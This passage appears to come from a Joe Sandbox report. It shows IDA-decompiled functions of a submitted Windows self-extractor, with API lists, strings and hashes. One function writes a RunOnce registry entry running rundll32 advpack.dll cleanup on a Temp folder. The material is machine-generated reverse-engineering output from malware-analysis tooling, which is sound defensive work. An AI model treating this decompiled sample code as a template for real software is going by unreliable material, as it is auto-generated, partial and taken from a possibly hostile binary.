                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				intOrPtr _t34;
                                                                                                                                                                                                    				int _t45;
                                                                                                                                                                                                    				int* _t50;
                                                                                                                                                                                                    				CHAR* _t52;
                                                                                                                                                                                                    				CHAR* _t61;
                                                                                                                                                                                                    				char* _t62;
                                                                                                                                                                                                    				int _t63;
                                                                                                                                                                                                    				CHAR* _t64;
                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t52 = __ecx;
                                                                                                                                                                                                    				_t23 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                    				_t62 = _a4;
                                                                                                                                                                                                    				_t50 = 0;
                                                                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                                                                    				_v276 = _t62;
                                                                                                                                                                                                    				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                    				if( *_t62 != 0x23) {
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t64 = _t62 + 1;
                                                                                                                                                                                                    					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                    					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                    					_t63 = 0x104;
                                                                                                                                                                                                    					_t34 = _v269;
                                                                                                                                                                                                    					if(_t34 == 0x53) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 == 0x57) {
                                                                                                                                                                                                    							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_push(_t52);
                                                                                                                                                                                                    							_v288 = 0x104;
                                                                                                                                                                                                    							E00171781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                    							_t59 = 0x104;
                                                                                                                                                                                                    							E0017658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                    							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								_t59 = _t63;
                                                                                                                                                                                                    								E0017658A(_t61, _t63, _v276);
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								if(RegQueryValueExA(_v284, 0x171140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                    									_t45 = _v280;
                                                                                                                                                                                                    									if(_t45 != 2) {
                                                                                                                                                                                                    										L9:
                                                                                                                                                                                                    										if(_t45 == 1) {
                                                                                                                                                                                                    											goto L10;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                    											_t45 = _v280;
                                                                                                                                                                                                    											goto L9;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t59 = 0x104;
                                                                                                                                                                                                    											E00171680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                    											L10:
                                                                                                                                                                                                    											_t50 = 1;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								RegCloseKey(_v284);
                                                                                                                                                                                                    								L15:
                                                                                                                                                                                                    								if(_t50 == 0) {
                                                                                                                                                                                                    									goto L16;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                    			}























                                                                                                                                                                                                    0x00172773
                                                                                                                                                                                                    0x0017277e
                                                                                                                                                                                                    0x00172785
                                                                                                                                                                                                    0x0017278a
                                                                                                                                                                                                    0x0017278d
                                                                                                                                                                                                    0x00172790
                                                                                                                                                                                                    0x00172792
                                                                                                                                                                                                    0x00172798
                                                                                                                                                                                                    0x0017279d
                                                                                                                                                                                                    0x001728b2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001727a3
                                                                                                                                                                                                    0x001727a3
                                                                                                                                                                                                    0x001727af
                                                                                                                                                                                                    0x001727c2
                                                                                                                                                                                                    0x001727c8
                                                                                                                                                                                                    0x001727cd
                                                                                                                                                                                                    0x001727d5
                                                                                                                                                                                                    0x001728b7
                                                                                                                                                                                                    0x001728b9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001727db
                                                                                                                                                                                                    0x001727dd
                                                                                                                                                                                                    0x001728aa
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001727e3
                                                                                                                                                                                                    0x001727e3
                                                                                                                                                                                                    0x001727ec
                                                                                                                                                                                                    0x001727f8
                                                                                                                                                                                                    0x00172803
                                                                                                                                                                                                    0x0017280b
                                                                                                                                                                                                    0x00172831
                                                                                                                                                                                                    0x001728c3
                                                                                                                                                                                                    0x001728c9
                                                                                                                                                                                                    0x001728cd
                                                                                                                                                                                                    0x00172837
                                                                                                                                                                                                    0x0017285a
                                                                                                                                                                                                    0x0017285c
                                                                                                                                                                                                    0x00172865
                                                                                                                                                                                                    0x00172892
                                                                                                                                                                                                    0x00172895
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172867
                                                                                                                                                                                                    0x00172878
                                                                                                                                                                                                    0x0017288c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017287a
                                                                                                                                                                                                    0x00172880
                                                                                                                                                                                                    0x00172885
                                                                                                                                                                                                    0x00172897
                                                                                                                                                                                                    0x00172899
                                                                                                                                                                                                    0x00172899
                                                                                                                                                                                                    0x00172878
                                                                                                                                                                                                    0x00172865
                                                                                                                                                                                                    0x001728a0
                                                                                                                                                                                                    0x001728bf
                                                                                                                                                                                                    0x001728c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001728c1
                                                                                                                                                                                                    0x00172831
                                                                                                                                                                                                    0x001727dd
                                                                                                                                                                                                    0x001727d5
                                                                                                                                                                                                    0x001728e5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CharUpperA.USER32(4FFA21AA,00000000,00000000,00000000), ref: 001727A8
                                                                                                                                                                                                    • CharNextA.USER32(0000054D), ref: 001727B5
                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 001727BC
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172829
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172852
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00172870
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001728A0
                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 001728AA
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 001728B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 001727E4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                    • API String ID: 2659952014-2428544900
                                                                                                                                                                                                    • Opcode ID: 991d86819cd6b28f4f80c8559676a3ba3a9f3ed6b542945a41beb5f63443de5a
                                                                                                                                                                                                    • Instruction ID: 9db1e36d2cae256b734075aeefe5b12689ef2fb5e7d615dca4c24d512b15713c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 991d86819cd6b28f4f80c8559676a3ba3a9f3ed6b542945a41beb5f63443de5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441B571A0012CAFDB249B64DC85AEE77BDEF59700F4084A9F54DD2100DB708EC69FA2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                    			E00172267() {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v836;
                                                                                                                                                                                                    				void* _v840;
                                                                                                                                                                                                    				int _v844;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				intOrPtr* _t42;
                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                    				void* _t47;
                                                                                                                                                                                                    				void* _t49;
                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t19 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                    				if( *0x178530 != 0) {
                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                    								E0017658A( &_v268, 0x104, 0x171140);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                    							E0017171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                    							do {
                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00176CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00172272
                                                                                                                                                                                                    0x00172277
                                                                                                                                                                                                    0x00172279
                                                                                                                                                                                                    0x00172283
                                                                                                                                                                                                    0x00172289
                                                                                                                                                                                                    0x001722ab
                                                                                                                                                                                                    0x001722b1
                                                                                                                                                                                                    0x001722c4
                                                                                                                                                                                                    0x001722e0
                                                                                                                                                                                                    0x001722e6
                                                                                                                                                                                                    0x001722f5
                                                                                                                                                                                                    0x0017230d
                                                                                                                                                                                                    0x0017231c
                                                                                                                                                                                                    0x0017231c
                                                                                                                                                                                                    0x00172321
                                                                                                                                                                                                    0x0017233a
                                                                                                                                                                                                    0x00172342
                                                                                                                                                                                                    0x00172348
                                                                                                                                                                                                    0x0017234b
                                                                                                                                                                                                    0x0017234c
                                                                                                                                                                                                    0x0017234c
                                                                                                                                                                                                    0x0017234e
                                                                                                                                                                                                    0x0017234f
                                                                                                                                                                                                    0x0017236e
                                                                                                                                                                                                    0x0017236e
                                                                                                                                                                                                    0x0017237a
                                                                                                                                                                                                    0x00172380
                                                                                                                                                                                                    0x00172380
                                                                                                                                                                                                    0x00172381
                                                                                                                                                                                                    0x00172381
                                                                                                                                                                                                    0x0017238f

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 001722A3
                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 001722D8
                                                                                                                                                                                                    • memset.MSVCRT ref: 001722F5
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00172305
                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0017236E
                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0017237A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00172299
                                                                                                                                                                                                    • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0017232D
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00172321
                                                                                                                                                                                                    • wextract_cleanup0, xrefs: 0017227C, 001722CD, 00172363
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                    • API String ID: 3027380567-2554356261
                                                                                                                                                                                                    • Opcode ID: 294b532454cd3f729d2653e4b5eca4ed4e13776dd2f85adb8de48ea7400ed864
                                                                                                                                                                                                    • Instruction ID: d7820af902bd61c30f5e40fb189145cd29a16cdc8a66b85baa0d5bec8d8d9828
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 294b532454cd3f729d2653e4b5eca4ed4e13776dd2f85adb8de48ea7400ed864
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B531C371A40218ABDB219B64DC49FEB7B7CEF58700F4041A9F90DA6051EB70ABC9CB50
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                                                                    			E00173100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				struct HWND__* _t16;
                                                                                                                                                                                                    				struct HWND__* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t8 = _a8 - 0xf;
                                                                                                                                                                                                    				if(_t8 == 0) {
                                                                                                                                                                                                    					if( *0x178590 == 0) {
                                                                                                                                                                                                    						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                    						 *0x178590 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L13:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t11 = _t8 - 1;
                                                                                                                                                                                                    				if(_t11 == 0) {
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                    					EndDialog(_a4, ??);
                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t15 = _t11 - 0x100;
                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                    					E001743D0(_t33, _t16);
                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0x178d4c);
                                                                                                                                                                                                    					SetWindowTextA(_t33, "nst0dum");
                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                    					 *0x1788b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E001730C0);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_a12 != 6) {
                                                                                                                                                                                                    					if(_a12 != 7) {
                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                    			}









                                                                                                                                                                                                    0x00173108
                                                                                                                                                                                                    0x0017310b
                                                                                                                                                                                                    0x001731b7
                                                                                                                                                                                                    0x001731ca
                                                                                                                                                                                                    0x001731d0
                                                                                                                                                                                                    0x001731d0
                                                                                                                                                                                                    0x001731da
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001731da
                                                                                                                                                                                                    0x00173111
                                                                                                                                                                                                    0x00173114
                                                                                                                                                                                                    0x00173136
                                                                                                                                                                                                    0x00173136
                                                                                                                                                                                                    0x00173138
                                                                                                                                                                                                    0x0017313b
                                                                                                                                                                                                    0x00173141
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173143
                                                                                                                                                                                                    0x00173116
                                                                                                                                                                                                    0x0017311b
                                                                                                                                                                                                    0x0017314b
                                                                                                                                                                                                    0x00173151
                                                                                                                                                                                                    0x00173158
                                                                                                                                                                                                    0x0017316a
                                                                                                                                                                                                    0x00173176
                                                                                                                                                                                                    0x0017317d
                                                                                                                                                                                                    0x0017318b
                                                                                                                                                                                                    0x0017319e
                                                                                                                                                                                                    0x001731a3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001731ad
                                                                                                                                                                                                    0x00173120
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017312a
                                                                                                                                                                                                    0x00173134
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00173134
                                                                                                                                                                                                    0x0017312c
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0017313B
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0017314B
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0017316A
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00173176
                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0017317D
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00173185
                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00173190
                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,001730C0), ref: 001731A3
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 001731CA
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 3785188418-432003757
                                                                                                                                                                                                    • Opcode ID: 4bd7c835fbf60b103f86ebd9bc84c1a62d64506204f761230c31ab3e6994c085
                                                                                                                                                                                                    • Instruction ID: b66aab3c05cae61b94e0241b866b43f1b0a13bff6ba545cf199a9ba8fdcc5b34
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bd7c835fbf60b103f86ebd9bc84c1a62d64506204f761230c31ab3e6994c085
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8711B131244211BBEB116F24DC0CB9E3B74FF8A721F908620F82D919E0DB7096C1E782
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E0017468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				CHAR* _t14;
                                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                    				_t11 = __edx;
                                                                                                                                                                                                    				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                    				_t16 = _t4;
                                                                                                                                                                                                    				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                    					if(_t16 == 0) {
                                                                                                                                                                                                    						L5:
                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                    					if(_t15 == 0) {
                                                                                                                                                                                                    						goto L5;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                    					FreeResource(_t15);
                                                                                                                                                                                                    					return _t16;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t4;
                                                                                                                                                                                                    			}








                                                                                                                                                                                                    0x00174699
                                                                                                                                                                                                    0x0017469b
                                                                                                                                                                                                    0x001746a9
                                                                                                                                                                                                    0x001746af
                                                                                                                                                                                                    0x001746b4
                                                                                                                                                                                                    0x001746bc
                                                                                                                                                                                                    0x001746f9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001746f9
                                                                                                                                                                                                    0x001746d9
                                                                                                                                                                                                    0x001746dd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001746e5
                                                                                                                                                                                                    0x001746ef
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001746f5
                                                                                                                                                                                                    0x001746ff

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746A0
                                                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746A9
                                                                                                                                                                                                    • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001746C3
                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746CC
                                                                                                                                                                                                    • LockResource.KERNEL32(00000000,?,00172D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001746D3
                                                                                                                                                                                                    • memcpy_s.MSVCRT ref: 001746E5
                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001746EF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                    • String ID: TITLE$nst0dum
                                                                                                                                                                                                    • API String ID: 3370778649-1250357435
                                                                                                                                                                                                    • Opcode ID: 8582df6272357862dac4abdfd5078af6fe34cc07c0285386b27341c3b73d141f
                                                                                                                                                                                                    • Instruction ID: 53845515cf5306dd49a6ac12de41c0772d9859539091446c3b6052c912d54fc7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8582df6272357862dac4abdfd5078af6fe34cc07c0285386b27341c3b73d141f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FC0186362442107BE31027A55C4DF6F7E3CEFCAB52F844414FB4D96591DB6188C186A6
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 57%
                                                                                                                                                                                                    			E001717EE(intOrPtr* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				short _v12;
                                                                                                                                                                                                    				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				void* _t35;
                                                                                                                                                                                                    				struct HINSTANCE__* _t36;
                                                                                                                                                                                                    				signed int _t38;
                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t14 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                    				_v12 = 0x500;
                                                                                                                                                                                                    				_t37 = __ecx;
                                                                                                                                                                                                    				_v16.Value = 0;
                                                                                                                                                                                                    				_v28 = __ecx;
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                    				if(_t36 != 0) {
                                                                                                                                                                                                    					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                    					_v20 = _t20;
